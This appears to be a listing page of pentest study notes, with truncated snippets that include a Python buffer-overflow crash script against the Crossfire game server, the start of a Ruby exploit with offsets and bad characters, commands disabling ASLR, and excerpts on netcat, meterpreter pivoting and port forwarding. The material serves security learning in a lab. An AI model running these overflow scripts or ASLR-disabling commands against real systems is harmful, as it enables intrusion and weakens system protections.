Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 10:11:46

#!/usr/bin/python
import socket

host = "127.0.0.1"

crash = "\x41" * 4379

buffer = "\x11(setup sound " + crash + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
data=s.recv(1024)
print data
...


Score: 0


#!/usr/bin/env ruby

=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end

require 'socket'

#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"

#add eax, 12 = 83C00C
#jmp eax = FFE0


#create shellcode
#creates a bi...


Score: 0


cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c...


Score: 0

By: ajayverma 2019-06-25 10:11:58

badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
"\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" +
"\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4...


Score: 0


There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many technique...


Score: 0


The amazing netcat, used for so many fantastic things. If you’re learning the basics of penetration testing look into this tool inside out.

Too:
Netcat


Connect to a TCP Port

nc -nv <IP Address> <Port>
Listen on a TCP Port

nc -lvp <port>
Connect and receive a HTTP Page

nc -nv <IP Address> 80
HEAD / HTTP...


Score: 0


Once a meterpreter shell is obtained on a system a larger range of options is available to the Penetration Tester for accessing the system. In a hypothetical scenario the victim is running a vulnerable mail server on port 25, and we have a remote exploit we wish to use against it. Unfortunately for us it’s behind a firewall. After getting a meter...


Score: 0


Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense it matters who is initiating the connection, and who the destination server is. I’ll run through local port forwarding here, and in a seperate page, cover remote forwardin...


Score: 0


Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense it matters who is initiating the connection, and who the destination server is. I’ll run through remote port forwarding here, and in a seperate page, cover local forwardin...


Score: 0


SSH is fantastic for port redirection in a lot of cases, but what if you want to set up a redirection of incoming and outgoing ports without the hassle of setting up SSH servers? Rinetd is a great program that will let you do this.

Tool
Rinetd –
[Linux Download] http://www.boutell.com/rinetd/http/rinetd.tar.gz
[Windows Download] http://www...


Score: 0